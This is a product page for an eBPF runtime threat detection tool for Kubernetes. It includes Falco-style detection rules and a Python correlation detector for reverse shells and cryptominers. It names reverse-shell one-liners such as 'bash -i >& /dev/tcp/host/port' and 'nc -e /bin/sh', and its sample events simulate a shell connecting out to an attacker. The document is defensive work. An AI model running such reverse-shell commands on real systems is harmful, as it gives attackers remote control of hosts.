
Runtime Detection

See every syscall. Stop threats before they spread.

eBPF probes attach to kernel tracepoints on each node, capturing process ancestry, network connections, and file operations across every container workload, with under 2 ms of P99 event latency.

[Screenshot: eBPF runtime detection dashboard showing syscall events, process ancestry tree, and container threat alerts]

How eBPF Detection Works

Kernel-level visibility, zero instrumentation

Syscall tracepoint probes

The eBPF program attaches to the raw syscall tracepoints sys_enter_* and sys_exit_* (for example tracepoint/syscalls/sys_enter_execve). Every open, connect, execve, and ptrace call produces a structured event in a BPF ring buffer, which the userspace agent drains and processes with <2 ms P99 latency.

Process ancestry tree

Each event carries the full process chain from the container entrypoint to the process that triggered it. That chain is what exposes classic post-exploitation and escape patterns: a shell spawned by a web server process, execution of a binary that is not part of the image, and namespace manipulation through clone() and unshare() flags.

Network connection map

Intercepts connect() and accept() calls to build a live network graph of which pods are talking to which endpoints. Unexpected outbound connections to external IPs trigger configurable alerts.

Configurable detection rules

Ships with a baseline ruleset tuned for Kubernetes workloads. Custom rules use a YAML format compatible with Falco rule syntax, so an existing Falco rules library can be reused as-is.
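As an added example of the Falco-compatible rule format described above (not the product's shipped baseline ruleset), here is a two-rule detection for the nginx → bash reverse shell pattern written in Falco rule syntax. It uses only Falco's standard evt.*, proc.*, fd.*, container.* and user.* fields; that the product exposes exactly this field set is an assumption.

```yaml
# Added example in Falco rule syntax; not part of the product's baseline ruleset.
# Uses only standard Falco fields (evt.*, proc.*, fd.*, container.*, user.*).

- list: shell_binaries
  items: [sh, bash, dash, zsh, ash]

- list: web_server_binaries
  items: [nginx, apache2, httpd, gunicorn, php-fpm, node]

- list: private_nets
  items: ['"10.0.0.0/8"', '"172.16.0.0/12"', '"192.168.0.0/16"']

- macro: spawned_process
  condition: evt.type in (execve, execveat) and evt.dir=<

# Non-blocking sockets return EINPROGRESS from connect(); treat that as success,
# otherwise a reverse shell using a non-blocking socket is silently missed.
- macro: outbound_tcp
  condition: >
    evt.type=connect and evt.dir=< and fd.l4proto=tcp
    and (evt.rawres >= 0 or evt.res=EINPROGRESS)
    and fd.net != "127.0.0.0/8" and not fd.snet in (private_nets)

- rule: Shell Spawned By Web Server Process
  desc: A shell was started directly by a web server inside a container.
  condition: >
    spawned_process and container.id != host
    and proc.name in (shell_binaries) and proc.pname in (web_server_binaries)
  output: >
    Shell spawned by web server (parent=%proc.pname cmdline=%proc.cmdline
    user=%user.name container=%container.name image=%container.image.repository)
  priority: WARNING
  tags: [container, shell, mitre_execution]

- rule: Outbound Connection From Web Server Shell
  desc: >
    A shell whose parent is a web server opened an outbound TCP connection
    to a non-private address: the classic reverse shell pattern.
  condition: >
    outbound_tcp and container.id != host
    and proc.name in (shell_binaries) and proc.pname in (web_server_binaries)
  output: >
    Possible reverse shell (cmdline=%proc.cmdline dst=%fd.sip:%fd.sport
    container=%container.name image=%container.image.repository)
  priority: CRITICAL
  tags: [container, network, reverse_shell]
```

The second rule only covers the case where the shell itself calls connect() (for example `bash -i >& /dev/tcp/host/port`). A `nc -e /bin/sh` style shell inherits a socket its parent opened and never calls connect(), so a stateless rule on the shell's own syscalls will not see the connection; catching that ordering needs correlation across the parent's connect and the child's exec, which the rule language alone does not provide.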

Detection Scenarios

Threats we catch out of the box

Container escape

Privileged container abuse, host namespace access, and mount namespace escape attempts, detected by matching syscall patterns: unshare() and clone() with namespace flags, and mount() calls that expose host paths inside the container.

Reverse shell detection

A shell process spawned by a non-shell parent (e.g. nginx → bash), correlated with an outbound TCP connection from that process: a high-confidence reverse shell pattern that fires within 50 ms of event arrival.

Cryptominer execution

Detects XMRig and similar miners by combining the binary name, CPU-affinity syscalls such as sched_setaffinity, and outbound connections to common mining-pool ports. Renamed binaries are caught by hashing the executed file and comparing it against known miner hashes.

Lateral movement

Service-to-service connections inside the cluster that fall outside normal network policy, combined with reads of credential files, catch the early stages of pod-to-pod lateral movement before any exfiltration happens.
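The reverse shell and cryptominer scenarios above both depend on stateful correlation across events (an exec paired with a connect from the same or the parent process; a hash match followed by a pool-port connect), which a single stateless rule cannot express. The following is an added example of that correlation logic in Python; it is not the product's agent code. The event schema, the placeholder miner hash, the internal CIDR list and the sample event stream are all constructed for illustration, and it handles both orderings of the reverse shell pattern (shell connects itself, or parent connects and the shell inherits the socket).

```python
"""Stateful correlation for the reverse-shell and cryptominer scenarios.

Added example, not the vendor's agent: the event schema, the placeholder
miner hash, the internal CIDRs and the sample events are all constructed.
"""
import ipaddress

SHELLS = {"sh", "bash", "dash", "zsh", "ash"}
MINER_NAMES = {"xmrig", "minerd", "cpuminer"}
MINER_SHA256 = {"a" * 64}  # placeholder digest standing in for a real hash feed
MINING_POOL_PORTS = {3333, 5555, 7777, 14444, 45700}
INTERNAL_NETS = [ipaddress.ip_network(n) for n in  # assumed cluster ranges
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
WINDOW_MS = 5000  # max gap between a shell exec and its paired outbound connect


def is_external(ip):
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


class Detector:
    """Correlates exec/connect/exit events from one node into alerts."""

    def __init__(self):
        self.shells = {}     # pid -> exec event of a shell whose parent is not a shell
        self.connects = {}   # pid -> most recent external TCP connect by that pid
        self.miners = set()  # pids whose binary matched a miner name or hash
        self.alerts = []

    def feed(self, ev):
        {"exec": self._exec, "connect": self._connect, "exit": self._exit}[ev["type"]](ev)
        return self.alerts

    def _exit(self, ev):  # drop state on exit so pid reuse cannot pair stale entries
        self.shells.pop(ev["pid"], None)
        self.connects.pop(ev["pid"], None)
        self.miners.discard(ev["pid"])

    def _exec(self, ev):
        chain = ev["ancestry"]  # comm names from the container entrypoint to this process
        comm = chain[-1]
        parent = chain[-2] if len(chain) > 1 else None
        if comm in SHELLS and parent is not None and parent not in SHELLS:
            self.shells[ev["pid"]] = ev
            # Ordering A ("nc -e /bin/sh"): the parent connected first and the
            # shell inherits the socket, so the connect belongs to the parent pid.
            prior = self.connects.get(ev["ppid"])
            if prior is not None and 0 <= ev["ts"] - prior["ts"] <= WINDOW_MS:
                self._alert("reverse_shell", ev, prior)
        if comm in MINER_NAMES or ev["sha256"] in MINER_SHA256:
            self.miners.add(ev["pid"])
            # renamed=True: innocuous name, but the hash of the executed file matched
            self._alert("cryptominer", ev, None, renamed=comm not in MINER_NAMES)

    def _connect(self, ev):
        if ev["proto"] != "tcp" or not is_external(ev["dst"]):
            return
        self.connects[ev["pid"]] = ev
        # Ordering B ("bash -i >& /dev/tcp/host/port"): the shell itself connects.
        shell = self.shells.get(ev["pid"])
        if shell is not None and 0 <= ev["ts"] - shell["ts"] <= WINDOW_MS:
            self._alert("reverse_shell", shell, ev)
        # A pool-port connect alone is weak evidence; require a prior name/hash match.
        if ev["pid"] in self.miners and ev["dport"] in MINING_POOL_PORTS:
            self._alert("mining_pool_connect", ev, None)

    def _alert(self, kind, ev, related, **extra):
        self.alerts.append({"kind": kind, "container": ev["container"], "pid": ev["pid"],
                            "ancestry": ev["ancestry"], "related": related, **extra})


# Constructed sample stream (not captured from a real cluster); ts is in ms.
SAMPLE_EVENTS = [
    # web pod: nginx worker spawns bash, which dials out (ordering B)
    {"type": "exec", "ts": 1000, "pid": 812, "ppid": 7, "container": "web-5f9c",
     "ancestry": ["nginx", "nginx", "bash"], "sha256": "c" * 64},
    {"type": "connect", "ts": 1040, "pid": 812, "container": "web-5f9c",
     "ancestry": ["nginx", "nginx", "bash"], "proto": "tcp", "dst": "203.0.113.9", "dport": 4444},
    # batch pod: entrypoint shell runs a shell that talks to an in-cluster DB (benign)
    {"type": "exec", "ts": 2000, "pid": 900, "ppid": 1, "container": "batch-1a2b",
     "ancestry": ["sh", "bash"], "sha256": "d" * 64},
    {"type": "connect", "ts": 2010, "pid": 900, "container": "batch-1a2b",
     "ancestry": ["sh", "bash"], "proto": "tcp", "dst": "10.0.3.4", "dport": 5432},
    # batch pod: miner renamed to look like a kernel thread, then joins a pool
    {"type": "exec", "ts": 3000, "pid": 950, "ppid": 1, "container": "batch-1a2b",
     "ancestry": ["sh", "kworker"], "sha256": "a" * 64},
    {"type": "connect", "ts": 3100, "pid": 950, "container": "batch-1a2b",
     "ancestry": ["sh", "kworker"], "proto": "tcp", "dst": "203.0.113.50", "dport": 3333},
    # api pod: nc connects out first, then execs sh which inherits the socket (ordering A)
    {"type": "connect", "ts": 4000, "pid": 960, "container": "api-77d1",
     "ancestry": ["php-fpm", "nc"], "proto": "tcp", "dst": "198.51.100.7", "dport": 9001},
    {"type": "exec", "ts": 4100, "pid": 980, "ppid": 960, "container": "api-77d1",
     "ancestry": ["php-fpm", "nc", "sh"], "sha256": "e" * 64},
]


def run(events):
    det = Detector()
    for ev in events:
        det.feed(ev)
    return det.alerts
```

`run(SAMPLE_EVENTS)` returns four alerts: two `reverse_shell` (one per ordering), one `cryptominer` with `renamed=True` for the hash-only match, and one `mining_pool_connect` for that same pid; the entrypoint-shell-to-database pair produces nothing because the parent is itself a shell and the destination is in-cluster. The `exit` handler is not decoration: without it, pid reuse on a busy node would let a stale shell entry pair with an unrelated later connect.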

Runtime visibility in your cluster today.

Helm install in 15 minutes. First detection finding in the same sprint.